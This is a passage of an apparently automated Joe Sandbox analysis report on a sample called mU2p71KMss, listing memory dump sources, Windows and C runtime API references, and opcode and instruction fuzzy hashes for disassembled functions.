                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 043884D6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990031031.0000000004388000.00000040.00000020.00020000.00000000.sdmp, Offset: 04388000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_4388000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 4275171209-0
                                                                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                  • Instruction ID: 6cfb6ebe28ec5a2357c1d0bff875059bc1898b656da3c4a181ca576f15f3355a
                                                                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                  • Instruction Fuzzy Hash: DF113C79A00208EFDB01EF98C985E99BBF5AF08350F458094F9489B361D375EA90DF80
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset$_free_malloc_strstr$_wcsstr
                                                                                                  • String ID: "
                                                                                                  • API String ID: 430003804-123907689
                                                                                                  • Opcode ID: 1cdb3d0636dac09cc2f24788c7c1d72f8c986b6e2997366a203cf509162b2016
                                                                                                  • Instruction ID: a14fc26554a8ebd715a4244b11b1e3973ad1bccdfc27ef0da36a90e89e3d7adc
                                                                                                  • Opcode Fuzzy Hash: 1cdb3d0636dac09cc2f24788c7c1d72f8c986b6e2997366a203cf509162b2016
                                                                                                  • Instruction Fuzzy Hash: DE42D371508381ABDB21EF64CC48F9B7BE8BF85304F04092EF58997291DB75D649CBA2
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 23169db7a410551c83385ddf708b4d7ef8baad74fa6175bf0d512237d1225d66
                                                                                                  • Instruction ID: 6ebc85a23b75415406ebf85011e4528dc93da42cb9408235a0aac3b160c788fa
                                                                                                  • Opcode Fuzzy Hash: 23169db7a410551c83385ddf708b4d7ef8baad74fa6175bf0d512237d1225d66
                                                                                                  • Instruction Fuzzy Hash: 44525E71D04208DBDF11EFA8DC89BAEB7F5FF04304F14816AD419A7290E775AA49CBA1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • _wcsstr.LIBCMT ref: 05DDE72D
                                                                                                  • _wcsstr.LIBCMT ref: 05DDE756
                                                                                                  • _memset.LIBCMT ref: 05DDE784
                                                                                                    • Part of subcall function 05E1FC0C: std::exception::exception.LIBCMT ref: 05E1FC1F
                                                                                                    • Part of subcall function 05E1FC0C: __CxxThrowException@8.LIBCMT ref: 05E1FC34
                                                                                                    • Part of subcall function 05E1FC0C: std::exception::exception.LIBCMT ref: 05E1FC4D
                                                                                                    • Part of subcall function 05E1FC0C: __CxxThrowException@8.LIBCMT ref: 05E1FC62
                                                                                                    • Part of subcall function 05E1FC0C: std::regex_error::regex_error.LIBCPMT ref: 05E1FC74
                                                                                                    • Part of subcall function 05E1FC0C: __CxxThrowException@8.LIBCMT ref: 05E1FC82
                                                                                                    • Part of subcall function 05E1FC0C: std::exception::exception.LIBCMT ref: 05E1FC9B
                                                                                                    • Part of subcall function 05E1FC0C: __CxxThrowException@8.LIBCMT ref: 05E1FCB0
                                                                                                  • _wcsstr.LIBCMT ref: 05DDEA0C
                                                                                                  • _memset.LIBCMT ref: 05DDEE5C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Exception@8Throw$_wcsstrstd::exception::exception$_memset$std::regex_error::regex_error
                                                                                                  • String ID:
                                                                                                  • API String ID: 1338678108-0
                                                                                                  • Opcode ID: b5098284881af2f016dff51b4d469be074dfe0eb5f9feb8c37e34c07e0411b24
                                                                                                  • Instruction ID: 4ccbc6606aa6bc6e584e62b4505ce33e1b3019a133424d8788f7ef4f88a667fb
                                                                                                  • Opcode Fuzzy Hash: b5098284881af2f016dff51b4d469be074dfe0eb5f9feb8c37e34c07e0411b24
                                                                                                  • Instruction Fuzzy Hash: AD52AE71A002199FDF24DF68CC94BAEFBF9FF44304F14456AD84AAB281D731A945CBA1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 37c666b43537968137d919f050b0984878a90477fb183cf48e642191e4cf2ccd
                                                                                                  • Instruction ID: a68c625a66429ff84a14ed151a3fd9b9ab3c5615e556cdc6f4dfcdcb2a4074ff
                                                                                                  • Opcode Fuzzy Hash: 37c666b43537968137d919f050b0984878a90477fb183cf48e642191e4cf2ccd
                                                                                                  • Instruction Fuzzy Hash: 8E425D71E04208EBDB15EFA4CC49BEEB7F5FF04308F24416AD416A7290E771AA45CBA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                                                                                                  • Instruction ID: 1532e2b41689e666ba52d33e3571fb28825815b857ece7365e2d2d61e8535eb3
                                                                                                  • Opcode Fuzzy Hash: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                                                                                                  • Instruction Fuzzy Hash: C5527170E00249DFDB11DBA4C848FAEFBB9FF49704F148199E549AB290DB74AD45CBA0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,0040A3C1,004142EC,00000001,?,0040A4D8,004142EC,00000017), ref: 0040A334
                                                                                                  • UnhandledExceptionFilter.KERNEL32(004142EC,?,0040A3C1,004142EC,00000001,?,0040A4D8,004142EC,00000017), ref: 0040A33D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1987958618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1987943841.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1987974116.0000000000412000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1987989482.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1988003345.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1988003345.0000000000421000.00000008.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1988058136.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1988058136.000000000409F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1989938513.00000000040A1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_mU2p71KMss.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                  • String ID:
                                                                                                  • API String ID: 3192549508-0
                                                                                                  • Opcode ID: 201c1a21d9426f2c703b029de822ecd4bba0d46c1206059840ca0e40a68c95d5
                                                                                                  • Instruction ID: 307cec53737e5789a00372f04ba6450ea43eb2a69cdbc6aada34296422148bc5
                                                                                                  • Opcode Fuzzy Hash: 201c1a21d9426f2c703b029de822ecd4bba0d46c1206059840ca0e40a68c95d5
                                                                                                  • Instruction Fuzzy Hash: F8B09231044208BBCA026BE1ED09BC83F28EB09672F118020FB4D84060CBA294608BA9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $
                                                                                                  • API String ID: 0-3993045852
                                                                                                  • Opcode ID: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
                                                                                                  • Instruction ID: 38642c7c2bb5ddaa533ff7ffbdbb9260b449aadc2da39dad106789a5a783a176
                                                                                                  • Opcode Fuzzy Hash: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
                                                                                                  • Instruction Fuzzy Hash: 053283B4E002299BEF619F64CC44BAEB779FF44714F0051EAEB4DA2191DB748A80CF59
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • GetProcessHeap.KERNEL32(004043B2,004199F8,00000014), ref: 00405A52
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1987958618.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1987943841.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1987974116.0000000000412000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1987989482.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1988003345.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1988003345.0000000000421000.00000008.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1988058136.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1988058136.000000000409F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1989938513.00000000040A1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_mU2p71KMss.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: HeapProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 54951025-0
                                                                                                  • Opcode ID: 9f123d81dc24df98ac9dbbdec7ea2d7ca94bd84cda50fe16fecb41661c46a851
                                                                                                  • Instruction ID: 8ae5e9a541f790f3e7328ec155afd2371131d607e68bf3e9c667266f703b20ac
                                                                                                  • Opcode Fuzzy Hash: 9f123d81dc24df98ac9dbbdec7ea2d7ca94bd84cda50fe16fecb41661c46a851
                                                                                                  • Instruction Fuzzy Hash: 69B012B030220347470C8F397D5914939D4670C202304813E7007C2160DF20C460DA08
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 877f63b2793ebbe0b59198544446deee2a7ddffc7aca60e89c3a6b5019f50021
                                                                                                  • Instruction ID: 37abfd36cf8cd6f5e401de5ba81119ebe432c457c518ac10668d34a32f99050e
                                                                                                  • Opcode Fuzzy Hash: 877f63b2793ebbe0b59198544446deee2a7ddffc7aca60e89c3a6b5019f50021
                                                                                                  • Instruction Fuzzy Hash: 0742B071629F159BC3DAEF24C88055BF3E1FFC8218F048A1DD99997A50DB38F819CA91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e5f2568764100725235c6401e73ec7c3249674854c723175d34cd2e4a517ce8f
                                                                                                  • Instruction ID: 67fc871f7726498ae70fab8955665225d6a6fbcd02bffd48c826b0c01673f343
                                                                                                  • Opcode Fuzzy Hash: e5f2568764100725235c6401e73ec7c3249674854c723175d34cd2e4a517ce8f
                                                                                                  • Instruction Fuzzy Hash: 0922DF76908B129FC714CF19D08095AF7E1FF88324F558A6EE8A9A7B10C730BA55CB91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 91ba71904dea84e20fa54172000c9738ff60065219db22b0a49b9952a31d8242
                                                                                                  • Instruction ID: 05d082330c416e67c06a532964af8df8e1104b9eb0c871c855bdc4d54a32604c
                                                                                                  • Opcode Fuzzy Hash: 91ba71904dea84e20fa54172000c9738ff60065219db22b0a49b9952a31d8242
                                                                                                  • Instruction Fuzzy Hash: CDF1B571344B058FC758DE5DDDA1B16F7E5AB88318F19C728919ACBB64E378F8068B80
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: fbc65900fc73bc000bc8580b4acecc80d5647e222a799f60cb590115ce9fd550
                                                                                                  • Instruction ID: a4af6ff118187997f4259237f234cb687f3f42e1a9a6df242d56bdaaa576a1e2
                                                                                                  • Opcode Fuzzy Hash: fbc65900fc73bc000bc8580b4acecc80d5647e222a799f60cb590115ce9fd550
                                                                                                  • Instruction Fuzzy Hash: F8024C715187058FC756EF0CD49035AF3E1FFC8305F198A2DD68987A64E739A9198F82
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990031031.0000000004388000.00000040.00000020.00020000.00000000.sdmp, Offset: 04388000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_4388000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
                                                                                                  • Instruction ID: 24d27a6aa43525e76c7b7a3e232a10fa7948a000dac409155106f76070f4aa25
                                                                                                  • Opcode Fuzzy Hash: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
                                                                                                  • Instruction Fuzzy Hash: E93169B58063869FCB15DE70D890BB5FB70EF87324F18A5DCD0858F506D3266046CB94
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: dad9f5e2b4397fc96ae248ae23b4bb8b0f73d482c6b1a500fc30c3239f901945
                                                                                                  • Instruction ID: 0490d86b4bce045c3c4fd50df124024f9d30e3e971c92668636fd4ef92e6cccb
                                                                                                  • Opcode Fuzzy Hash: dad9f5e2b4397fc96ae248ae23b4bb8b0f73d482c6b1a500fc30c3239f901945
                                                                                                  • Instruction Fuzzy Hash: 40315E7682976A4FC3D3FE61894010AF291FFC5118F4D4B6CCD505B690D73EAA4A9A82
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: aca7381c331421ab033d5a8929ad27c90a0d590f00afa5b17f2b634ed140bded
                                                                                                  • Instruction ID: 6554821c01a8fa3d2f2a7eb05a68a0db1abdec3f1d5c79325b7793689e55f228
                                                                                                  • Opcode Fuzzy Hash: aca7381c331421ab033d5a8929ad27c90a0d590f00afa5b17f2b634ed140bded
                                                                                                  • Instruction Fuzzy Hash: 9C3126306183419FD741EF29C480A5BFBE0FFC8254F41DA5AF98897221D730E984CB62
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                  • Instruction ID: 8a651747b522e78abd6528a3049a9d2aa84ef3e63613aefee5752d50c8d5345a
                                                                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                  • Instruction Fuzzy Hash: 4F112977208182C3D60486AED8B45B693D5FBC6220B2F437BD3B34B658D122D141DB80
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
                                                                                                  • Instruction ID: 9eb0d746c4bf04be3216c63df409a43d170dbd674bd1ed84af94adf103ca23cc
                                                                                                  • Opcode Fuzzy Hash: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
                                                                                                  • Instruction Fuzzy Hash: B9114F0A8492C4BDCF424A7840E56EBFFA68E3B218F4A71DAC8C44B743D01B150FE7A1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                  • Instruction ID: a0c667d4b89f8b08d9b17e9ec1244e7f1588fd36b86ba9f8430e65f2fc4cdc94
                                                                                                  • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                  • Instruction Fuzzy Hash: E9117C72340100AFEB54DE65DC98EB6B3EAFB88220B198166E908CB351F676E841C760
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990031031.0000000004388000.00000040.00000020.00020000.00000000.sdmp, Offset: 04388000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_4388000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                  • Instruction ID: 9f246c348f4fe5b17f51de925c196404139bae6605caef43048eaed438194485
                                                                                                  • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                  • Instruction Fuzzy Hash: A511A972340200AFD754EF55DCC0FA6B3D9EB89364B598169ED04CB312D775E841C760
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f7a2a3c4e4e7b1265b14b7c3247eccdedd29083849295e66ade5a7e6f19b4579
                                                                                                  • Instruction ID: 2171f14de095971ce99d3b8a5c03f15d6e88b3d0eeaa7b279bc14600646ac797
                                                                                                  • Opcode Fuzzy Hash: f7a2a3c4e4e7b1265b14b7c3247eccdedd29083849295e66ade5a7e6f19b4579
                                                                                                  • Instruction Fuzzy Hash: 92012876810662ABD740DF3EC8C045AFBF1BB082117528B2ADC9083A41D334E662DBE8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
                                                                                                  • String ID:
                                                                                                  • API String ID: 1442030790-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 05DF3F51
                                                                                                    • Part of subcall function 05DF5BA8: __getptd_noexit.LIBCMT ref: 05DF5BA8
                                                                                                  • __gmtime64_s.LIBCMT ref: 05DF3FEA
                                                                                                  • __gmtime64_s.LIBCMT ref: 05DF4020
                                                                                                  • __gmtime64_s.LIBCMT ref: 05DF403D
                                                                                                  • __allrem.LIBCMT ref: 05DF4093
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05DF40AF
                                                                                                  • __allrem.LIBCMT ref: 05DF40C6
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05DF40E4
                                                                                                  • __allrem.LIBCMT ref: 05DF40FB
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05DF4119
                                                                                                  • __invoke_watson.LIBCMT ref: 05DF418A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 384356119-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
                                                                                                  • String ID:
                                                                                                  • API String ID: 3432600739-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5dd0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free$ExitProcess___crt
                                                                                                  • String ID:
                                                                                                  • API String ID: 1022109855-0
                                                                                                  • Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                                                                                                  • Instruction ID: e88781716faf56be41e6af26ee681ced89ded916bc7e2fe266b06208f3079ec8
                                                                                                  • Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                                                                                                  • Instruction Fuzzy Hash: 7131B131A00250DBCB21AF54FC8885977B4FB14330746862BEB06573A0CBB459CDEFA6
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • std::exception::exception.LIBCMT ref: 05E1FC1F
                                                                                                    • Part of subcall function 05E0169C: std::exception::_Copy_str.LIBCMT ref: 05E016B5
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 05E1FC34
                                                                                                  • std::exception::exception.LIBCMT ref: 05E1FC4D
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 05E1FC62
                                                                                                  • std::regex_error::regex_error.LIBCPMT ref: 05E1FC74
                                                                                                    • Part of subcall function 05E1F914: std::exception::exception.LIBCMT ref: 05E1F92E
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 05E1FC82
                                                                                                  • std::exception::exception.LIBCMT ref: 05E1FC9B
